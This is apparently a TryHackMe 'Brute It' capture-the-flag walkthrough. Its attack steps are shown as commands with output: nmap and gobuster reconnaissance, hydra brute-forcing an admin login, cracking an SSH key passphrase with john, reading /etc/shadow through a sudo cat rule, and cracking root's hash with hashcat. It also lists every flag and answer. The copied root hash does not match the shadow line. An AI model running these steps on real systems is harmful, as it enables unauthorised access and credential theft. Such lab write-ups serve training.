# Brute It {% embed url="" %} ## ## Task 1: About this box ### Deploy the machine

### No answer needed ## ## Task 2: Reconnaissance ### Search for open ports using nmap. How many ports are open? * Let's perform a `nmap` scan against the machine. ``` $ nmap -sC -sV 10.10.30.186 Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-07 08:43 IST Nmap scan report for 10.10.30.186 Host is up (0.17s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA) | 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA) |_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.11 seconds ``` * There are two open ports: | Port | Service | | ---- | ------- | | 22 | ssh | | 80 | http | ### Answer ``` 2 ``` ### ### What version of SSH is running? * The answer is present in the `nmap` scan. ### Answer ``` OpenSSH 7.6p1 ``` ### ### What version of Apache is running? * The answer is in the `nmap` scan. ### Answer ``` 2.4.29 ``` ### ### Which Linux distribution is running? * The answer is in the `nmap` scan. ### Answer ``` Ubuntu ``` #### ### Search for hidden directories on web server. What is the hidden directory? * Let's brute force the web pages using `gobuster`. ``` $ gobuster dir -u http://10.10.30.186 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.30.186 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 277] /.htpasswd (Status: 403) [Size: 277] /.htaccess (Status: 403) [Size: 277] /admin (Status: 301) [Size: 312] [--> http://10.10.30.186/admin/] /index.html (Status: 200) [Size: 10918] /server-status (Status: 403) [Size: 277] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== ``` ### Answer ``` /admin ``` #### ## Task 2: Getting a shell ### What is the user:password of the admin panel? * Let's go to the `admin/` directory.

* We can check the source code using `CTRL+U`.

* Now that we know the username, we can use `hydra` to brute force the password. ``` $ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.30.186 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid" Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-07 09:48:50 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://10.10.30.186:80/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid [80][http-post-form] host: 10.10.30.186 login: admin password: xavier 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-07 09:49:25 ``` ### Answer ``` admin:xavier ``` ### ### Crack the RSA key you found. What is John's RSA Private Key passphrase?> * Let's login with `admin` as the username and `xavier` as the password.

* Let's download the `RSA private key` for the user `john`. ``` $ wget http://10.10.30.186/admin/panel/id_rsa --2023-12-07 09:59:03-- http://10.10.30.186/admin/panel/id_rsa Connecting to 10.10.30.186:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1766 (1.7K) Saving to: ‘id_rsa’ id_rsa 100%[========================================================================================================================================>] 1.72K --.-KB/s in 0s 2023-12-07 09:59:04 (3.21 No error) - ‘id_rsa’ saved [1766/1766] ``` * We can use `ssh2john` to create a hash file. ``` $ ssh2john id_rsa > id_hash ``` * Now we can use `john` to crack the hashes. ``` $ john id_hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 3 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status rockinroll (id_rsa) 1g 0:00:00:00 DONE (2023-12-07 10:04) 4.000g/s 290496p/s 290496c/s 290496C/s romeo23..renatito Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` ### Answer ``` rockinroll ``` ### ### user.txt * Let's change the permissions of the `id_rsa` file. ``` $ chmod 700 id_rsa ``` * Now that we know that the password for `john` is `rockinroll`, let's login through SSH. ``` $ ssh -i id_rsa john@10.10.30.186 Enter passphrase for key 'id_rsa': Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Dec 7 04:40:36 UTC 2023 System load: 0.0 Processes: 102 Usage of /: 25.7% of 19.56GB Users logged in: 0 Memory usage: 36% IP address for eth0: 10.10.30.186 Swap usage: 0% 63 packages can be updated. 0 updates are security updates. Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106 john@bruteit:~$ ``` * Let's read the `user.txt` file. ``` john@bruteit:~$ ls user.txt john@bruteit:~$ cat user.txt THM{a_password_is_not_a_barrier} ``` ### Answer ``` THM{a_password_is_not_a_barrier} ``` ### ### Web flag * The web flag was present on the page with the RSA private key. ``` THM{brut3_f0rce_is_e4sy} ``` ## ## Task 4: Privilege Escalation ### Find a form to escalate your privileges. What is the root's password? * Let's check what `sudo` commands `john` has the permission to execute. ``` john@bruteit:~$ sudo -l Matching Defaults entries for john on bruteit: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User john may run the following commands on bruteit: (root) NOPASSWD: /bin/cat ``` * So we can run `/bin/cat` as an elevated user. * That means we can cat the `/etc/shadow` file. ``` john@bruteit:~$ sudo /bin/cat /etc/shadow root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7::: daemon:*:18295:0:99999:7::: bin:*:18295:0:99999:7::: sys:*:18295:0:99999:7::: sync:*:18295:0:99999:7::: games:*:18295:0:99999:7::: man:*:18295:0:99999:7::: lp:*:18295:0:99999:7::: mail:*:18295:0:99999:7::: news:*:18295:0:99999:7::: uucp:*:18295:0:99999:7::: proxy:*:18295:0:99999:7::: www-data:*:18295:0:99999:7::: backup:*:18295:0:99999:7::: list:*:18295:0:99999:7::: irc:*:18295:0:99999:7::: gnats:*:18295:0:99999:7::: nobody:*:18295:0:99999:7::: systemd-network:*:18295:0:99999:7::: systemd-resolve:*:18295:0:99999:7::: syslog:*:18295:0:99999:7::: messagebus:*:18295:0:99999:7::: _apt:*:18295:0:99999:7::: lxd:*:18295:0:99999:7::: uuidd:*:18295:0:99999:7::: dnsmasq:*:18295:0:99999:7::: landscape:*:18295:0:99999:7::: pollinate:*:18295:0:99999:7::: thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7::: sshd:*:18489:0:99999:7::: john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7::: ``` * We can tell that the `root` user's password is hashed using SHA-512 by the `$6$` characters. * Let's save the `root` user's hash on our machine. ``` $ echo $6$zdk0jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6MJYPUTAaWu4infDjI88U9yUXEVgL > root_hash ``` * We have to find the correct mode for SHA-512.

* Let's run `hashcat` in order to crack this hash. ``` $ hashcat -a 0 -m 1800 root_hash.txt /usr/share/wordlists/rockyou.txt ``` ### Answer ``` football ``` ### ### root.txt * Let's switch to the `root` user. ``` john@bruteit:~$ su root Password: root@bruteit:/home/john# ``` * We can now read the `root.txt` file. ``` root@bruteit:/home/john# cd /root root@bruteit:~# cat root.txt THM{pr1v1l3g3_3sc4l4t10n} ``` ### Answer ``` THM{pr1v1l3g3_3sc4l4t10n} ```